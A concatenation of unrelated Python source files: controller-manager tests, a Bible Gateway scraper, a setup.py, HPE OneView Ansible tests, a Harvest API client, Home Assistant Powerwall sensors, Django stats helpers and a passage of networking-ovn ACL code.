py | b41048621d0a56098c7fbc54a142cc0a5d171de8 | # Copyright 2014 Ahmed El-Hassany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from sts.entities.controllers import ControllerConfig
from sts.entities.controllers import POXController
from sts.topology.controllers_manager import ControllersManager
class ControllersManagerTest(unittest.TestCase):
def get_config(self, address='127.0.0.1', port=6633):
start_cmd = ("./pox.py --verbose --no-cli sts.syncproto.pox_syncer "
"--blocking=False openflow.of_01 --address=__address__ "
"--port=__port__")
kill_cmd = ""
cwd = "pox"
config = ControllerConfig(start_cmd=start_cmd, kill_cmd=kill_cmd, cwd=cwd,
address=address, port=port, cid=port)
return config
def get_controller(self, address='127.0.0.1', port=6633):
config = self.get_config(address, port)
ctrl = POXController(controller_config=config)
return ctrl
def test_add_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
manager = ControllersManager()
# Act
manager.add_controller(c1)
manager.add_controller(c2)
failed_add1 = lambda: manager.add_controller(c1)
failed_add2 = lambda: manager.add_controller(c2)
# Assert
self.assertIn(c1, manager.controllers)
self.assertIn(c2, manager.controllers)
self.assertIn(c1, manager.live_controllers)
self.assertIn(c2, manager.failed_controllers)
self.assertRaises(AssertionError, failed_add1)
self.assertRaises(AssertionError, failed_add2)
def test_remove_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
manager.remove_controller(c1)
manager.remove_controller(c2)
failed_remove1 = lambda: manager.remove_controller(c1)
failed_remove2 = lambda: manager.remove_controller(c2)
# Assert
self.assertNotIn(c1, manager.controllers)
self.assertNotIn(c2, manager.controllers)
self.assertNotIn(c1, manager.live_controllers)
self.assertNotIn(c2, manager.failed_controllers)
self.assertRaises(AssertionError, failed_remove1)
self.assertRaises(AssertionError, failed_remove2)
def test_up_controllers(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
# Assert
self.assertIn(c1, manager.up_controllers)
self.assertNotIn(c1, manager.down_controllers)
self.assertIn(c2, manager.down_controllers)
self.assertNotIn(c2, manager.up_controllers)
def test_crash_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
c2.start()
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
manager.crash_controller(c1)
# Assert
self.assertIn(c1, manager.controllers)
self.assertIn(c2, manager.controllers)
self.assertIn(c1, manager.failed_controllers)
self.assertIn(c2, manager.live_controllers)
def test_recover_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
manager.recover_controller(c1)
# Assert
self.assertIn(c1, manager.controllers)
self.assertIn(c2, manager.controllers)
self.assertIn(c1, manager.live_controllers)
self.assertIn(c2, manager.failed_controllers)
def test_create_controller(self):
# Arrange
manager = ControllersManager()
# Act
failed = lambda: manager.create_controller('127.0.0.1', 6633)
# Assert
self.assertRaises(AssertionError, failed)
def test_get_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
get_c1 = manager.get_controller(6633)
get_c2 = manager.get_controller(6644)
# Assert
    self.assertEqual(get_c1, c1)
    self.assertEqual(get_c2, c2) |
py | b4104967001b18952936a4e6d65923219c68589c | import requests
import json
import re
from bs4 import BeautifulSoup
bible = "21st Century King James version";
bibleCode = "KJ21";
testament= "old";
book = "Hosea"
chapters = 15;
verses = []
r = '{'
r += '"__collections__": {'
r += '"' + bible + '": {'
r += '"' + book + '": {'
r += '"bible": ' + '"' + bible + '",'
r += '"bible-code": ' + '"' + bibleCode + '",'
r += '"testament": ' + '"' + testament + '",'
r += '"book": ' + '"' + book + '",'
r += '"__collections__" : {'
for a in range(1, chapters):
response = requests.get(
'https://www.biblegateway.com/passage/?search=' + str(book) + '+' + str(a) + '&version=' + str(bibleCode))
html = response.text
soup = BeautifulSoup(html, "html.parser")
r += '"Chapter ' + str(a) + '": {'
for b, tag in enumerate(soup.find_all("p")):
if(str(tag.find_next("span").get("id")) != "None"):
r += '"verse ' + str(b + 1) + '": {'
r += '"verse_id": "' + str(tag.find_next("span").get("id")) + '",'
r += '"verse_number": "' + str(b + 1) + '",'
r += '"chapter": "' + str(tag.find_next("span").get("class")) + '",'
r += '"verse": "' + re.sub('<[^<]+?>', '', str(tag)) + '",'
r += '"raw": ' + json.dumps(str(tag))
if b <= (len(soup.find_all("p")) - 3):
r += '},'
else:
r += '}'
if a <= (chapters-2):
r += '},'
else:
r+= '}'
r += '}'
r += '}'
r += '}'
r += '}'
r += '}'
f = open("dataBackup.txt", "w+")
f.write(r)
f.close()
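# Alternative sketch (not in the original script): building nested dicts and serialising
# with json.dumps avoids malformed output when verse text contains quotes or backslashes.
def build_export(verses_by_chapter):
    # `verses_by_chapter` is a hypothetical dict like {"Chapter 1": {"verse 1": {...}}}.
    export = {
        "__collections__": {
            bible: {
                book: {
                    "bible": bible,
                    "bible-code": bibleCode,
                    "testament": testament,
                    "book": book,
                    "__collections__": verses_by_chapter,
                }
            }
        }
    }
    return json.dumps(export, indent=2)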
|
py | b41049a3aa04c64f2e4c60c033cae9d860852a84 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
requires = [
'selfie',
'executors',
'yaxil',
'matplotlib',
'nibabel',
'scipy'
]
test_requirements = [
]
about = dict()
with open(os.path.join(here, 'boldqc', '__version__.py'), 'r') as f:
exec(f.read(), about)
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
packages=find_packages(),
package_data={
'': ['libexec/*.py', 'libexec/*.sh']
},
include_package_data=True,
scripts=[
'scripts/boldQC.py'
],
install_requires=requires,
tests_require=test_requirements
)
|
py | b4104a4bec0666d91bdb29b7dc6311cf3be19dc9 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###
# Copyright (2019-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
import mock
from copy import deepcopy
from ansible_collections.hpe.oneview.tests.unit.utils.hpe_test_utils import OneViewBaseFactsTest
from ansible_collections.hpe.oneview.tests.unit.utils.oneview_module_loader import ServerProfileFactsModule
ERROR_MSG = 'Fake message error'
ENCLOSURE_GROUP_URI = '/rest/enclosure-groups/3af25c76-dec7-4753-83f6-e1ad06c29a43'
HARDWARE_TYPE_URI = '/rest/server-hardware-types/C8DEF9A6-9586-465E-A951-3070988BC226'
HARDWARE_URI = '/rest/server-hardware/C8DEF9A6-9586-465E-A951-3070988BC226'
PROFILE_URI = '/rest/server-profiles/57d3af2a-b6d2-4446-8645-f38dd808ea4d'
STORAGE_SYSTEM_ID = "TXQ1010307"
PARAMS_GET_ALL = dict(
config='config.json'
)
PARAMS_GET_BY_NAME = dict(
config='config.json',
name="Test Server Profile"
)
PARAMS_GET_BY_URI = dict(
config='config.json',
uri="/rest/fake"
)
PARAMS_WITH_OPTIONS = dict(
config='config.json',
name="Test Server Profile",
options=[
'schema',
'compliancePreview',
'newProfileTemplate',
{'profilePorts': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'serverHardwareUri': HARDWARE_URI,
}
},
'messages',
{'transformation': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'serverHardwareUri': HARDWARE_URI,
}
},
{'availableNetworks': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'serverHardwareUri': HARDWARE_URI,
'view': 'FibreChannel'
}
},
{'availableServers': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'profileUri': PROFILE_URI
}
},
{'availableStorageSystem': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'storageSystemId': STORAGE_SYSTEM_ID
}
},
{'availableStorageSystems': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'start': 1,
'count': 15,
'filter': "\"'status'='OK'\"",
'sort': 'name:ascending'
}
},
{'availableTargets': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'profileUri': PROFILE_URI
}
}
]
)
@pytest.mark.resource(TestServerProfileFactsModule='server_profiles')
class TestServerProfileFactsModule(OneViewBaseFactsTest):
"""
FactsParamsTestCase has common tests for the parameters support.
"""
def test_should_get_all_servers(self):
server_profiles = [
{"name": "Server Profile Name 1"},
{"name": "Server Profile Name 2"}
]
self.mock_ov_client.server_profiles.get_all.return_value = server_profiles
self.mock_ansible_module.params = deepcopy(PARAMS_GET_ALL)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(server_profiles=server_profiles)
)
def test_should_get_by_name(self):
servers = {"name": "Server Profile Name", 'uri': '/rest/test/123'}
obj = mock.Mock()
obj.data = servers
self.mock_ov_client.server_profiles.get_by_name.return_value = obj
self.mock_ansible_module.params = deepcopy(PARAMS_GET_BY_NAME)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(server_profiles=[servers])
)
def test_should_get_by_uri(self):
server_profile = {"name": "Server Profile Name", 'uri': '/rest/test/123'}
obj = mock.Mock()
obj.data = server_profile
self.mock_ov_client.server_profiles.get_by_uri.return_value = obj
self.mock_ansible_module.params = deepcopy(PARAMS_GET_BY_URI)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(server_profiles=[server_profile])
)
def test_should_get_server_profile_by_name_with_all_options(self):
mock_option_return = {'subresource': 'value'}
self.mock_ov_client.server_profiles.data = {"name": "Server Profile Name", "uri": PROFILE_URI}
self.mock_ov_client.server_profiles.get_by_name.return_value = self.mock_ov_client.server_profiles
self.mock_ov_client.server_profiles.get_messages.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_transformation.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_compliance_preview.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_new_profile_template.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_schema.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_profile_ports.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_networks.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_servers.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_system.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_systems.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_targets.return_value = mock_option_return
self.mock_ansible_module.params = deepcopy(PARAMS_WITH_OPTIONS)
ServerProfileFactsModule().run()
self.mock_ov_client.server_profiles.get_messages.assert_called_once_with()
self.mock_ov_client.server_profiles.get_transformation.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI, serverHardwareTypeUri=HARDWARE_TYPE_URI,
serverHardwareUri=HARDWARE_URI)
self.mock_ov_client.server_profiles.get_compliance_preview.assert_called_once_with()
self.mock_ov_client.server_profiles.get_new_profile_template.assert_called_once_with()
self.mock_ov_client.server_profiles.get_schema.assert_called_once_with()
self.mock_ov_client.server_profiles.get_profile_ports.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, serverHardwareUri=HARDWARE_URI, )
self.mock_ov_client.server_profiles.get_available_networks.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, serverHardwareUri=HARDWARE_URI, view='FibreChannel')
self.mock_ov_client.server_profiles.get_available_servers.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, profileUri=PROFILE_URI)
self.mock_ov_client.server_profiles.get_available_storage_system.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI,
serverHardwareTypeUri=HARDWARE_TYPE_URI, storageSystemId=STORAGE_SYSTEM_ID)
self.mock_ov_client.server_profiles.get_available_storage_systems.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI, serverHardwareTypeUri=HARDWARE_TYPE_URI, start=1, count=15,
filter="\"'status'='OK'\"", sort="name:ascending")
self.mock_ov_client.server_profiles.get_available_targets.assert_called_once_with(
enclosureGroupUri=ENCLOSURE_GROUP_URI, profileUri=PROFILE_URI, serverHardwareTypeUri=HARDWARE_TYPE_URI)
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts={'server_profiles': [{'name': 'Server Profile Name', 'uri': PROFILE_URI}],
'server_profile_schema': mock_option_return,
'server_profile_compliance_preview': mock_option_return,
'server_profile_new_profile_template': mock_option_return,
'server_profile_profile_ports': mock_option_return,
'server_profile_messages': mock_option_return,
'server_profile_transformation': mock_option_return,
'server_profile_available_networks': mock_option_return,
'server_profile_available_servers': mock_option_return,
'server_profile_available_storage_system': mock_option_return,
'server_profile_available_storage_systems': mock_option_return,
'server_profile_available_targets': mock_option_return,
}
)
def test_should_get_all_server_profiles_with_options(self):
mock_option_return = {'subresource': 'value'}
params_get_all_options = deepcopy(PARAMS_WITH_OPTIONS)
del params_get_all_options['name']
self.mock_ov_client.server_profiles.get_all.return_value = [{"name": "Server Profile Name", "uri": PROFILE_URI}]
self.mock_ov_client.server_profiles.get_schema.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_profile_ports.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_networks.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_servers.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_system.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_storage_systems.return_value = mock_option_return
self.mock_ov_client.server_profiles.get_available_targets.return_value = mock_option_return
self.mock_ansible_module.params = deepcopy(params_get_all_options)
ServerProfileFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts={'server_profiles': [{'name': 'Server Profile Name', 'uri': PROFILE_URI}],
'server_profile_schema': mock_option_return,
'server_profile_profile_ports': mock_option_return,
'server_profile_available_networks': mock_option_return,
'server_profile_available_servers': mock_option_return,
'server_profile_available_storage_system': mock_option_return,
'server_profile_available_storage_systems': mock_option_return,
'server_profile_available_targets': mock_option_return,
}
)
def test_should_get_server_profiles_with_invalid_profile_ports_option(self):
mock_option_return = {'subresource': 'value'}
obj = mock.Mock()
obj.data = {"name": "Server Profile Name", "uri": PROFILE_URI}
self.mock_ov_client.server_profiles.get_by_name.return_value = obj
self.mock_ov_client.server_profiles.get_profile_ports.return_value = mock_option_return
self.mock_ansible_module.params = dict(
config='config.json',
name="Test Server Profile",
options=[
{'profilePorts': [1]}
])
ServerProfileFactsModule().run()
self.mock_ov_client.server_profiles.get_profile_ports.assert_called_once_with()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts={'server_profiles': [{'name': 'Server Profile Name', 'uri': PROFILE_URI}],
'server_profile_profile_ports': mock_option_return,
}
)
if __name__ == '__main__':
pytest.main([__file__])
|
py | b4104a8239bffe49a06ee72cf9294cf369114762 | '''
>>> import Harvest
>>> Harvest.HarvestStatus().get()
u'up'
>>> harvest = Harvest.Harvest("https://COMPANYNAME.harvestapp.com", "EMAIL", "PASSWORD")
>>> data = {"notes":"test note", "project_id":"PROJECT_ID","hours":"1.0", "task_id": "TASK_ID"}
>>> harvest.add(data)
>>> data['notes'] = "another test"
>>> harvest.update("ENTRY_ID", data)
>>> harvest.get_today()
'''
from xml.dom.minidom import Document #to create xml out of dict
import requests
from requests.auth import HTTPBasicAuth
class HarvestError(Exception):
pass
class Harvest(object):
def __init__(self, uri, email, password):
self.uri = uri
self.email = email
self.password = password
self.headers = {
'Accept': 'application/json',
'User-Agent': 'TimeTracker for Linux',
}
def status(self):
return self._request("GET", 'http://harveststatus.com/status.json')
def get_today(self):
return self._request('GET', "%s/daily" % self.uri)
def get_day(self, day_of_the_year=1, year=2012):
return self._request('GET', '%s/daily/%s/%s' % (self.uri, day_of_the_year, year))
def get_entry(self, entry_id):
return self._request("GET", "%s/daily/show/%s" % (self.uri, entry_id))
def toggle_timer(self, entry_id):
return self._request("GET", "%s/daily/timer/%s" % (self.uri, entry_id))
def add(self, data):
return self._request("POST", '%s/daily/add' % self.uri, data)
def delete(self, entry_id):
return self._request("DELETE", "%s/daily/delete/%s" % (self.uri, entry_id))
def update(self, entry_id, data):
return self._request('POST', '%s/daily/update/%s' % (self.uri, entry_id), data)
def _request(self, method="GET", url="", data=None):
if method != "DELETE":
if data:
r = requests.post(url, data=data, headers=self.headers, auth=HTTPBasicAuth(self.email, self.password))
else:
if not url.endswith(".json"):  # don't put auth headers on a plain status request
r = requests.get(url=url, headers=self.headers, auth=HTTPBasicAuth(self.email, self.password))
else:
r = requests.get(url)
try:
return r.json()  # .json is a method in current versions of requests
except Exception as e:
raise HarvestError(e)
else:
try:
r = requests.delete(url, headers=self.headers, auth=HTTPBasicAuth(self.email, self.password))
return r  # return the response so callers can inspect the result of the delete
except Exception as e:
raise HarvestError(e)
class HarvestStatus(Harvest):
def __init__(self):
self.harvest = Harvest("", "", "").status()
def get(self):
return self.harvest['status']
|
py | b4104b70f39d37b557a9511aa1f06b6269b23934 | """Support for powerwall binary sensors."""
from tesla_powerwall import GridStatus, MeterType
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_BATTERY_CHARGING,
DEVICE_CLASS_CONNECTIVITY,
BinarySensorEntity,
)
from homeassistant.const import DEVICE_CLASS_POWER
from .const import (
DOMAIN,
POWERWALL_API_DEVICE_TYPE,
POWERWALL_API_GRID_SERVICES_ACTIVE,
POWERWALL_API_GRID_STATUS,
POWERWALL_API_METERS,
POWERWALL_API_SERIAL_NUMBERS,
POWERWALL_API_SITE_INFO,
POWERWALL_API_SITEMASTER,
POWERWALL_API_STATUS,
POWERWALL_COORDINATOR,
)
from .entity import PowerWallEntity
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the powerwall binary sensors."""
powerwall_data = hass.data[DOMAIN][config_entry.entry_id]
coordinator = powerwall_data[POWERWALL_COORDINATOR]
site_info = powerwall_data[POWERWALL_API_SITE_INFO]
device_type = powerwall_data[POWERWALL_API_DEVICE_TYPE]
status = powerwall_data[POWERWALL_API_STATUS]
powerwalls_serial_numbers = powerwall_data[POWERWALL_API_SERIAL_NUMBERS]
entities = []
for sensor_class in (
PowerWallRunningSensor,
PowerWallGridServicesActiveSensor,
PowerWallGridStatusSensor,
PowerWallConnectedSensor,
PowerWallChargingStatusSensor,
):
entities.append(
sensor_class(
coordinator, site_info, status, device_type, powerwalls_serial_numbers
)
)
async_add_entities(entities, True)
class PowerWallRunningSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of a Powerwall running sensor."""
@property
def name(self):
"""Device Name."""
return "Powerwall Status"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_POWER
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_running"
@property
def is_on(self):
"""Get the powerwall running state."""
return self.coordinator.data[POWERWALL_API_SITEMASTER].is_running
class PowerWallConnectedSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of a Powerwall connected sensor."""
@property
def name(self):
"""Device Name."""
return "Powerwall Connected to Tesla"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_CONNECTIVITY
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_connected_to_tesla"
@property
def is_on(self):
"""Get the powerwall connected to tesla state."""
return self.coordinator.data[POWERWALL_API_SITEMASTER].is_connected_to_tesla
class PowerWallGridServicesActiveSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of a Powerwall grid services active sensor."""
@property
def name(self):
"""Device Name."""
return "Grid Services Active"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_POWER
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_grid_services_active"
@property
def is_on(self):
"""Grid services is active."""
return self.coordinator.data[POWERWALL_API_GRID_SERVICES_ACTIVE]
class PowerWallGridStatusSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of a Powerwall grid status sensor."""
@property
def name(self):
"""Device Name."""
return "Grid Status"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_POWER
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_grid_status"
@property
def is_on(self):
"""Grid is online."""
return self.coordinator.data[POWERWALL_API_GRID_STATUS] == GridStatus.CONNECTED
class PowerWallChargingStatusSensor(PowerWallEntity, BinarySensorEntity):
"""Representation of a Powerwall charging status sensor."""
@property
def name(self):
"""Device Name."""
return "Powerwall Charging"
@property
def device_class(self):
"""Device Class."""
return DEVICE_CLASS_BATTERY_CHARGING
@property
def unique_id(self):
"""Device Uniqueid."""
return f"{self.base_unique_id}_powerwall_charging"
@property
def is_on(self):
"""Powerwall is charging."""
# is_sending_to returns true for values greater than 100 watts
return (
self.coordinator.data[POWERWALL_API_METERS]
.get_meter(MeterType.BATTERY)
.is_sending_to()
)
|
py | b4104bbe5d75ec10f806a3a715ca58815e205319 | from datetime import datetime, timedelta
from django.db.models import Sum
from django.utils.timezone import make_aware
from ..models import Face, Subject, Task, Frame, VideoRecord, Camera, Stat
def update_total_stats():
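"""Recompute the all-time totals (stored sizes and object counts) and save them as RESOLUTION_ALL stats."""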
def faces_image_size():
result = Face.objects.all().aggregate(
Sum('size_bytes'))['size_bytes__sum']
return result if result is not None else 0
def frames_image_size():
result = Frame.objects.all().aggregate(
Sum('size_bytes'))['size_bytes__sum']
return result if result is not None else 0
def videos_size():
result = VideoRecord.objects.all().aggregate(
Sum('size_bytes'))['size_bytes__sum']
return result if result is not None else 0
def stored_subjects_eval():
# return randint(0, 50)
result = Subject.objects.filter().count()
return result
def stored_faces_eval():
# return randint(0, 50)
result = Face.objects.filter().count()
return result
def stored_frames_eval():
# return randint(0, 50)
result = Frame.objects.filter().count()
return result
def stored_cameras_eval():
# return randint(0, 50)
result = Camera.objects.filter().count()
return result
def stored_videos_eval():
# return randint(0, 50)
result = VideoRecord.objects.filter().count()
return result
def stored_tasks_eval():
# return randint(0, 50)
result = Task.objects.filter().count()
return result
stats_kwargs = [
{
'name': 'faces_image_size',
'value_eval': faces_image_size
}, {
'name': 'frames_image_size',
'value_eval': frames_image_size
}, {
'name': 'videos_size',
'value_eval': videos_size
}, {
'name': 'stored_subjects',
'value_eval': stored_subjects_eval
}, {
'name': 'stored_faces',
'value_eval': stored_faces_eval
}, {
'name': 'stored_frames',
'value_eval': stored_frames_eval
}, {
'name': 'stored_cameras',
'value_eval': stored_cameras_eval
}, {
'name': 'stored_videos',
'value_eval': stored_videos_eval
}, {
'name': 'stored_tasks',
'value_eval': stored_tasks_eval
}
]
for stat_kwargs in stats_kwargs:
stat, _ = Stat.objects.get_or_create(
name=stat_kwargs['name'],
resolution=Stat.RESOLUTION_ALL
)
stat.timestamp = make_aware(datetime.now())
stat.value = stat_kwargs['value_eval']()
stat.save()
def update_time_stats(resolution):
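"""Refresh the time-bucketed task statistics (faces, frames, processing time, task counts) for the given resolution."""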
def faces_count_eval(min_timestamp, max_timestamp):
# return randint(0, 100)
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp
).aggregate(Sum('faces_count'))['faces_count__sum']
return result if result is not None else 0
def frames_count_eval(min_timestamp, max_timestamp):
# return randint(0, 1000)
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp
).aggregate(Sum('frames_count'))['frames_count__sum']
return result if result is not None else 0
def processing_time_eval(min_timestamp, max_timestamp):
# return 7200 * random() + 1800
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp
).aggregate(Sum('processing_time'))['processing_time__sum']
return result if result is not None else 0
def tasks_count_eval(min_timestamp, max_timestamp):
# return 7200 * random() + 1800
result = Task.objects.filter(
created_at__gt=min_timestamp,
created_at__lte=max_timestamp,
status__in=[Task.STATUS_SUCCESS, Task.STATUS_STOPPED, Task.STATUS_KILLED]
).distinct().count()
return result if result is not None else 0
stats_kwargs = [
{
'name': 'faces_count',
'value_eval': faces_count_eval
}, {
'name': 'frames_count',
'value_eval': frames_count_eval
}, {
'name': 'processing_time',
'value_eval': processing_time_eval
}, {
'name': 'tasks_count',
'value_eval': tasks_count_eval
}
]
for stat_kwargs in stats_kwargs:
update_stat(resolution=resolution, **stat_kwargs)
def update_stat(name: str, resolution: str, value_eval: callable):
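"""Fill in the time-bucketed values for one stat.
Buckets older than the trailing window (24 hours for hourly stats, 30 days for
daily stats) are deleted; any missing buckets up to the current time are computed
with ``value_eval`` and stored, e.g.
update_stat('faces_count', Stat.RESOLUTION_HOUR, faces_count_eval).
"""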
if resolution == Stat.RESOLUTION_HOUR:
replace_kwargs = {
'minute': 0,
'second': 0,
'microsecond': 0
}
backward_kwargs = {'hours': 24}
forward_kwargs = {'hours': 1}
elif resolution == Stat.RESOLUTION_DAY:
replace_kwargs = {
'hour': 0,
'minute': 0,
'second': 0,
'microsecond': 0
}
backward_kwargs = {'days': 30}
forward_kwargs = {'hours': 24}
else:
raise ValueError(f'Invalid resolution "{resolution}"')
query = Stat.objects.filter(
name=name,
resolution=resolution
).order_by('-timestamp')
last_stat = None
if query.exists():
last_stat = query.last()
now = make_aware(datetime.now())
now = now.replace(**replace_kwargs)
min_timestamp = now - timedelta(**backward_kwargs)
if not last_stat:
last_update_at = min_timestamp
else:
last_update_at = last_stat.timestamp.replace(**replace_kwargs)
if last_update_at < min_timestamp:
last_update_at = min_timestamp
stats_query = Stat.objects.filter(
name=name,
resolution=resolution,
timestamp__lte=min_timestamp
)
if stats_query.exists():
stats_query.delete()
# count = Face.objects.filter(
# created_at__gt=last_update_at
# ).count()
#
# if count == 0:
# return
timestamp_prev = last_update_at
timestamp = last_update_at + timedelta(**forward_kwargs)
while timestamp <= now:
value = value_eval(min_timestamp=timestamp_prev, max_timestamp=timestamp)
# value = Face.objects.filter(
# created_at__gt=timestamp_prev,
# created_at__lte=timestamp
# ).count()
stat, _ = Stat.objects.get_or_create(
name=name,
resolution=resolution,
timestamp=timestamp
)
stat.value = value
stat.save()
timestamp_prev = timestamp
timestamp = timestamp + timedelta(**forward_kwargs) |
py | b4104cff22a73fe3e50768f05867a525a03d4461 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import netaddr
#from neutron_lib import constants as const
from networking_ovn.neutron_lib import constants as const
from oslo_config import cfg
from networking_ovn.common import config
from networking_ovn.common import constants as ovn_const
from networking_ovn.common import utils
def is_sg_enabled():
return cfg.CONF.SECURITYGROUP.enable_security_group
def acl_direction(r, port):
if r['direction'] == 'ingress':
portdir = 'outport'
else:
portdir = 'inport'
return '%s == "%s"' % (portdir, port['id'])
def acl_ethertype(r):
match = ''
ip_version = None
icmp = None
if r['ethertype'] == 'IPv4':
match = ' && ip4'
ip_version = 'ip4'
icmp = 'icmp4'
elif r['ethertype'] == 'IPv6':
match = ' && ip6'
ip_version = 'ip6'
icmp = 'icmp6'
return match, ip_version, icmp
def acl_remote_ip_prefix(r, ip_version):
if not r['remote_ip_prefix']:
return ''
src_or_dst = 'src' if r['direction'] == 'ingress' else 'dst'
return ' && %s.%s == %s' % (ip_version, src_or_dst,
r['remote_ip_prefix'])
def acl_protocol_and_ports(r, icmp):
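"""Return the OVN match fragment for the rule's protocol and its port or ICMP type/code range."""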
protocol = None
match = ''
if r['protocol'] in ('tcp', 'udp',
str(const.PROTO_NUM_TCP),
str(const.PROTO_NUM_UDP)):
# OVN expects the protocol name not number
if r['protocol'] == str(const.PROTO_NUM_TCP):
protocol = 'tcp'
elif r['protocol'] == str(const.PROTO_NUM_UDP):
protocol = 'udp'
else:
protocol = r['protocol']
port_match = '%s.dst' % protocol
elif r.get('protocol') in (const.PROTO_NAME_ICMP,
const.PROTO_NAME_IPV6_ICMP,
const.PROTO_NAME_IPV6_ICMP_LEGACY,
str(const.PROTO_NUM_ICMP),
str(const.PROTO_NUM_IPV6_ICMP)):
protocol = icmp
